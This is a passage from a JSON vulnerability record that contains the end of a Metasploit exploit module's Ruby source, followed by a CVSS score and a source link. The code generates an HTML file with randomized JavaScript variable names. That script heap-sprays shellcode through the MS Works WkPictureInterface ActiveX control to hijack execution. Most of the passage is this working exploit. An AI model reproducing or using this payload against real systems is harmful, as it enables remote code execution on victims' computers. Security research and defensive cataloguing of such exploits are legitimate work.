rand_text_alpha(rand(10) + 1)\n rand1 = rand_text_alpha(rand(100) + 1)\n rand2 = rand_text_alpha(rand(100) + 1)\n rand3 = rand_text_alpha(rand(100) + 1)\n rand4 = rand_text_alpha(rand(100) + 1)\n rand5 = rand_text_alpha(rand(100) + 1)\n rand6 = rand_text_alpha(rand(100) + 1)\n rand7 = rand_text_alpha(rand(100) + 1)\n\n content = %Q|\n<html>\n<object id='#{vname}' classid='clsid:00E1DB59-6EFD-4CE7-8C0A-2DA3BCAAD9C6'></object>\n<body>\n<script language=\"JavaScript\">\nvar #{rand1} = unescape('#{shellcode}');\nvar #{rand2} = unescape('#{ret}');\nvar #{rand3} = 20;\nvar #{rand4} = #{rand3} + #{rand1}.length;\nwhile (#{rand2}.length < #{rand4}) #{rand2} += #{rand2};\nvar #{rand5} = #{rand2}.substring(0,#{rand4});\nvar #{rand6} = #{rand2}.substring(0,#{rand2}.length - #{rand4});\nwhile (#{rand6}.length + #{rand4} < 0x10000) #{rand6} = #{rand6} + #{rand6} + #{rand5};\nvar #{rand7} = new Array();\nfor (#{var_i} = 0; #{var_i} < 1000; #{var_i}++){ #{rand7}[#{var_i}] = #{rand6} + #{rand1} }\n#{vname}.WksPictureInterface = 168430090;\n</script>\n</body>\n</html>\n|\n\n print_status(\"Creating HTML file ...\")\n\n file_create(content)\n end\nend\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/fileformat/msworks_wkspictureinterface.rb"}]}
